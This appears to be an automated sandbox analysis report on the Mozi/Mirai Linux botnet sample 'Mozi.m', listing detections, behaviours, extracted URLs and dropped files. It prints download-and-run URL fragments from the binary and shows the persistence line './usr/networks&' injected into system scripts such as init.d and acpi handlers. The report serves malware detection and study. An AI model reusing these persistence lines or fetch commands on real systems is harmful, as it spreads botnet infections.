              Source: /tmp/Mozi.m (PID: 3492)Queries kernel information via 'uname':
              Source: /tmp/Mozi.m (PID: 3515)Queries kernel information via 'uname':
              Source: /sbin/modprobe (PID: 3691)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 4541)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 4568)Queries kernel information via 'uname':
              Source: kvm-test-1-run.sh.66.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
              Source: kvm-test-1-run.sh.66.drBinary or memory string: kill -KILL $qemu_pid
              Source: functions.sh0.66.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
              Source: kvm-test-1-run.sh.66.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
              Source: functions.sh0.66.drBinary or memory string: qemu-system-ppc64)
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_pid=$!
              Source: kvm-test-1-run.sh.66.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
              Source: kvm.sh.66.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
              Source: kvm-recheck-lock.sh.66.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
              Source: functions.sh0.66.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
              Source: kvm-test-1-run.sh.66.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
              Source: kvm.sh.66.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
              Source: functions.sh0.66.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
              Source: functions.sh0.66.drBinary or memory string: identify_qemu_append () {
              Source: kvm-test-1-run.sh.66.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
              Source: functions.sh0.66.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
              Source: functions.sh0.66.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
              Source: kvm-test-1-run.sh.66.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
              Source: kvm-test-1-run.sh.66.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
              Source: functions.sh0.66.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
              Source: kvm-test-1-run.sh.66.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
              Source: functions.sh0.66.drBinary or memory string: identify_qemu_args () {
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
              Source: functions.sh0.66.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
              Source: kvm-test-1-run.sh.66.drBinary or memory string: # Generate -smp qemu argument.
              Source: kvm-test-1-run.sh.66.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
              Source: functions.sh0.66.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
              Source: kvm.sh.66.drBinary or memory string: --qemu-args|--qemu-arg)
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
              Source: functions.sh0.66.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
              Source: functions.sh0.66.drBinary or memory string: echo $TORTURE_QEMU_CMD
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_MAC=$2
              Source: kvm-test-1-run.sh.66.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
              Source: kvm-test-1-run.sh.66.drBinary or memory string: vcpus=`identify_qemu_vcpus`
              Source: functions.sh0.66.drBinary or memory string: specify_qemu_cpus () {
              Source: functions.sh0.66.drBinary or memory string: echo qemu-system-ppc64
              Source: functions.sh0.66.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
              Source: kvm.sh.66.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
              Source: functions.sh0.66.drBinary or memory string: qemu-system-ppc64)
              Source: functions.sh0.66.drBinary or memory string: # identify_boot_image qemu-cmd
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_ARG="$2"
              Source: kvm-recheck-rcu.sh.66.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
              Source: functions.sh0.66.drBinary or memory string: # identify_qemu_append qemu-cmd
              Source: kvm-test-1-run.sh.66.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
              Source: functions.sh0.66.drBinary or memory string: identify_qemu_vcpus () {
              Source: functions.sh0.66.drBinary or memory string: # qemu-args already contains "-smp".
              Source: functions.sh0.66.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
              Source: functions.sh0.66.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
              Source: functions.sh0.66.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
              Source: functions.sh0.66.drBinary or memory string: # identify_qemu_vcpus
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_CMD="$2"
              Source: functions.sh0.66.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
              Source: functions.sh0.66.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
              Source: kvm.sh.66.drBinary or memory string: --qemu-cmd)
              Source: functions.sh0.66.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_args=$5
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
              Source: kvm-test-1-run.sh.66.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
              Source: kvm-test-1-run.sh.66.drBinary or memory string: # Generate qemu -append arguments
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
              Source: functions.sh0.66.drBinary or memory string: # identify_qemu builddir
              Source: kvm-test-1-run.sh.66.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
              Source: functions.sh0.66.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
              Source: functions.sh0.66.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
              Source: kvm.sh.66.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
              Source: functions.sh0.66.drBinary or memory string: echo qemu-system-i386
              Source: functions.sh0.66.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
              Source: functions.sh0.66.drBinary or memory string: echo qemu-system-x86_64
              Source: functions.sh0.66.drBinary or memory string: identify_qemu () {

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Hidden Files and Directories1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 294799 Sample: Mozi.m Startdate: 07/10/2020 Architecture: LINUX Score: 100 98 Antivirus detection for dropped file 2->98 100 Antivirus / Scanner detection for submitted sample 2->100 102 Multi AV Scanner detection for submitted file 2->102 104 4 other signatures 2->104 11 dash sleep Mozi.m 2->11         started        13 dash logrotate 2->13         started        15 dash resolvconf 2->15         started        17 51 other processes 2->17 process3 process4 19 Mozi.m 11->19         started        21 logrotate gzip 13->21         started        23 logrotate gzip 13->23         started        25 logrotate gzip 13->25         started        33 4 other processes 13->33 27 resolvconf 15->27         started        29 resolvconf mkdir 15->29         started        31 sh date 17->31         started        35 5 other processes 17->35 process5 37 Mozi.m 19->37         started        41 resolvconf sed 27->41         started        43 resolvconf sed 27->43         started        file6 90 /usr/sbin/alsa-info.sh, ASCII 37->90 dropped 92 /usr/networks, ELF 37->92 dropped 94 /usr/bin/gettext.sh, ASCII 37->94 dropped 96 21 other malicious files 37->96 dropped 106 Sample tries to persist itself using /etc/profile 37->106 108 Drops files in suspicious directories 37->108 110 Sample reads /proc/mounts (often used for finding a writable filesystem) 37->110 112 Sample tries to persist itself using System V runlevels 37->112 45 Mozi.m 37->45         started        48 Mozi.m sh 37->48         started        50 Mozi.m sh 37->50         started        52 30 other processes 37->52 signatures7 process8 signatures9 120 Opens /proc/net/* files useful for finding connected devices and routers 45->120 54 Mozi.m sh 45->54         started        56 Mozi.m sh 45->56         started        58 Mozi.m sh 45->58         started        69 5 other processes 45->69 60 sh killall 48->60         started        63 sh iptables 50->63         started        65 sh iptables 52->65         started        67 sh iptables 52->67         started        71 21 other processes 52->71 process10 signatures11 73 sh iptables 54->73         started        76 sh iptables 56->76         started        78 sh iptables 58->78         started        116 Terminates several processes with shell command 'killall' 60->116 118 Executes the "iptables" command to insert, remove and/or manipulate rules 63->118 80 sh iptables 69->80         started        82 sh iptables 69->82         started        84 sh iptables 69->84         started        86 2 other processes 69->86 process12 signatures13 114 Executes the "iptables" command to insert, remove and/or manipulate rules 73->114 88 iptables modprobe 73->88         started        process14

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Mozi.m70%VirustotalBrowse
              Mozi.m62%ReversingLabsLinux.Trojan.Mirai
              Mozi.m100%AviraLINUX/Mirai.lldau

              Dropped Files

              SourceDetectionScannerLabelLink
              /usr/networks100%AviraLINUX/Mirai.lldau
              /usr/networks62%ReversingLabsLinux.Trojan.Mirai

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://pastebin.ca)0%Avira URL Cloudsafe
              http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
              http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
              http://127.0.0.10%Avira URL Cloudsafe
              http://www.alsa-project.org0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m0%Avira URL Cloudsafe
              http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
              http://127.0.0.1sendcmd0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
              http://%s:%d/bin.sh0%Avira URL Cloudsafe
              http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
              http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
              http://www.alsa-project.org.0%Avira URL Cloudsafe
              http://HTTP/1.10%Avira URL Cloudsafe
              http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://pastebin.ca)alsa-info.sh0.66.drfalse
              • Avira URL Cloud: safe
              low
              http://%s:%d/bin.sh;chmodMozi.mtrue
              • Avira URL Cloud: safe
              low
              http://%s:%d/Mozi.a;chmodMozi.mfalse
              • Avira URL Cloud: safe
              low
              http://schemas.xmlsoap.org/soap/encoding/Mozi.mfalse
                high
                http://%s:%d/Mozi.m;$Mozi.mtrue
                • Avira URL Cloud: safe
                low
                http://schemas.xmlsoap.org/soap/envelope/Mozi.mfalse
                  high
                  http://127.0.0.1Mozi.mfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://baidu.com/%s/%s/%d/%s/%s/%s/%s)Mozi.mfalse
                    high
                    http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.66.drfalse
                      high
                      http://www.alsa-project.orgalsa-info.sh0.66.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.pastebin.ca/upload.phpalsa-info.sh0.66.drfalse
                        high
                        http://%s:%d/Mozi.mMozi.mtrue
                        • Avira URL Cloud: safe
                        low
                        http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.66.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1sendcmdMozi.mfalse
                        • Avira URL Cloud: safe
                        low
                        http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.66.drfalse
                          high
                          http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.66.drfalse
                            high
                            http://ipinfo.io/ipMozi.mfalse
                              high
                              http://%s:%d/Mozi.m;/tmp/Mozi.mMozi.mtrue
                              • Avira URL Cloud: safe
                              low
                              http://%s:%d/bin.shMozi.mtrue
                              • Avira URL Cloud: safe
                              low
                              http://www.pastebin.caalsa-info.sh0.66.drfalse
                                high
                                http://purenetworks.com/HNAP1/Mozi.mfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.alsa-project.org/alsa-info.shalsa-info.sh0.66.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://%s:%d/Mozi.m;Mozi.mtrue
                                • Avira URL Cloud: safe
                                low
                                http://www.alsa-project.org.alsa-info.sh0.66.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://HTTP/1.1Mozi.mfalse
                                • Avira URL Cloud: safe
                                low
                                http://%s:%d/Mozi.a;sh$Mozi.mfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.pastebin.ca.alsa-info.sh0.66.drfalse
                                  high
                                  http://schemas.xmlsoap.org/soap/envelope//Mozi.mfalse
                                    high

                                    Contacted IPs

                                    No contacted IP infos

                                    General Information

                                    Joe Sandbox Version:30.0.0 Red Diamond
                                    Analysis ID:294799
                                    Start date:07.10.2020
                                    Start time:23:40:11
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 6m 53s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Mozi.m
                                    Cookbook file name:defaultlinuxfilecookbook.jbs
                                    Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                    Detection:MAL
                                    Classification:mal100.spre.troj.evad.linM@0/230@0/0
                                    Warnings:
                                    Show All
                                    • VT rate limit hit for: http://pastebin.ca)


                                    Runtime Messages

                                    Command:/tmp/Mozi.m
                                    Exit Code:0
                                    Exit Code Info:
                                    Killed:False
                                    Standard Output:

                                    Standard Error:telnetd: no process found
                                    utelnetd: no process found
                                    scfgmgr: no process found
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    /bin/sh: 1: cfgtool: not found
                                    /bin/sh: 1: cfgtool: not found
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                                    Unsupported ioctl: cmd=0xffffffff80045705

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASN

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    /etc/init.d/S95baby.sh1skm346XtzGet hashmaliciousBrowse
                                      Mozi.aGet hashmaliciousBrowse
                                        Mozi.1.mGet hashmaliciousBrowse
                                          6wuvHEBHt8.binGet hashmaliciousBrowse
                                            7v1ic5IS8IGet hashmaliciousBrowse
                                              Mozi.aGet hashmaliciousBrowse
                                                Mozi.aGet hashmaliciousBrowse
                                                  Mozi.mGet hashmaliciousBrowse
                                                    Mozi.mGet hashmaliciousBrowse
                                                      Mozi.mGet hashmaliciousBrowse
                                                        bad_fileGet hashmaliciousBrowse
                                                          mxjzQQFgLpGet hashmaliciousBrowse
                                                            JrAL1wW1MQGet hashmaliciousBrowse
                                                              /etc/rcS.d/S95baby.sh1skm346XtzGet hashmaliciousBrowse
                                                                Mozi.aGet hashmaliciousBrowse
                                                                  Mozi.1.mGet hashmaliciousBrowse
                                                                    6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                      7v1ic5IS8IGet hashmaliciousBrowse
                                                                        Mozi.aGet hashmaliciousBrowse
                                                                          Mozi.aGet hashmaliciousBrowse
                                                                            Mozi.mGet hashmaliciousBrowse
                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                  bad_fileGet hashmaliciousBrowse
                                                                                    mxjzQQFgLpGet hashmaliciousBrowse
                                                                                      JrAL1wW1MQGet hashmaliciousBrowse

                                                                                        Created / dropped Files

                                                                                        /boot/grub/i386-pc/modinfo.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):23
                                                                                        Entropy (8bit):3.882045108136863
                                                                                        Encrypted:false
                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                        /etc/acpi/asus-keyboard-backlight.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):326
                                                                                        Entropy (8bit):5.2904323771702915
                                                                                        Encrypted:false
                                                                                        MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                        SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                        SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                        SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                        /etc/acpi/asus-wireless.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):157
                                                                                        Entropy (8bit):4.412729940630044
                                                                                        Encrypted:false
                                                                                        MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                        SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                        SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                        SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                        /etc/acpi/ibm-wireless.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):636
                                                                                        Entropy (8bit):4.722087767454589
                                                                                        Encrypted:false
                                                                                        MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                        SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                        SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                        SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                        /etc/acpi/powerbtn.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):2079
                                                                                        Entropy (8bit):4.778187000249208
                                                                                        Encrypted:false
                                                                                        MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                        SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                        SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                        SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                        /etc/acpi/tosh-wireless.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):483
                                                                                        Entropy (8bit):4.215331622973397
                                                                                        Encrypted:false
                                                                                        MD5:07889D65619CDB80F8E876A087F160D3
                                                                                        SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                        SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                        SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                        /etc/acpi/undock.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):266
                                                                                        Entropy (8bit):4.77497394042067
                                                                                        Encrypted:false
                                                                                        MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                        SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                        SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                        SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                        Malicious:false
                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                        /etc/bash_completion.d/libreoffice.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):23
                                                                                        Entropy (8bit):3.882045108136863
                                                                                        Encrypted:false
                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                        Malicious:false
                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                        /etc/init.d/S95baby.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                        Size (bytes):25
                                                                                        Entropy (8bit):3.8936606896881854
                                                                                        Encrypted:false
                                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                        Malicious:true
                                                                                        Joe Sandbox View:
                                                                                        • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                        • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                        • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                        • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                        • Filename: bad_file, Detection: malicious, Browse
                                                                                        • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                        • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                        Preview: #!/bin/sh./usr/networks&.
                                                                                        /etc/init.d/bootmisc.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):148
                                                                                        Entropy (8bit):4.718194263525147
                                                                                        Encrypted:false
